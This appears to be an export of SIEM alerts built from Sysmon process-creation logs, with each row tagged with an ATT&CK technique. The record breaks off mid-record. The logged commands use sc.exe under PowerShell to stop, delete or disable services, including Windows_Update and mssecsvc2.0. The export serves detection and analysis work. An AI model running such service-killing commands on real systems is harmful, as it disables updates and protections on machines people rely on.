""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.669850200Z"",""eventRecordID"":""2384"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.666\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010a10d1e00}\r\nProcessId: 7872\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:01.666"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010a10d1e00}"",""processId"":""7872"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinVaultSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.900",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.632 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010f80b1e00} +ProcessId: 7216 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete SvcNlauser +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.639876200Z"",""eventRecordID"":""2382"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.632\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010f80b1e00}\r\nProcessId: 7216\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete SvcNlauser\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.632"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010f80b1e00}"",""processId"":""7216"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.872",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.616 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010fa0a1e00} +ProcessId: 7076 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SvcNlauser +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.618209400Z"",""eventRecordID"":""2381"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.616\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010fa0a1e00}\r\nProcessId: 7076\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.616"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010fa0a1e00}"",""processId"":""7076"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.775",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.484 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-001066081e00} +ProcessId: 5700 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Windows Managers"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.488163800Z"",""eventRecordID"":""2378"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.484\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-001066081e00}\r\nProcessId: 5700\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""\r\nCurrentDirectory: C:\\Users\\John 
Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.484"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-001066081e00}"",""processId"":""5700"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Windows Managers\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.733",8,"ATT&CK T1489: Stop Windows 
Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.371 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-00109b051e00} +ProcessId: 1600 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Windows_Update +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.374781500Z"",""eventRecordID"":""2375"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.371\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-00109b051e00}\r\nProcessId: 1600\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating 
System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.371"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-00109b051e00}"",""processId"":""1600"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Windows_Update"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.463",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.345 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010b1041e00} +ProcessId: 5740 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Windows_Update Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Windows_Update Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.356332800Z"",""eventRecordID"":""2374"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.345\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010b1041e00}\r\nProcessId: 5740\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Windows_Update Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.345"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010b1041e00}"",""processId"":""5740"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Windows_Update Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.431",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.298 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-00101f021e00} +ProcessId: 6880 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.0 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.304916500Z"",""eventRecordID"":""2372"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.298\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-00101f021e00}\r\nProcessId: 6880\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® 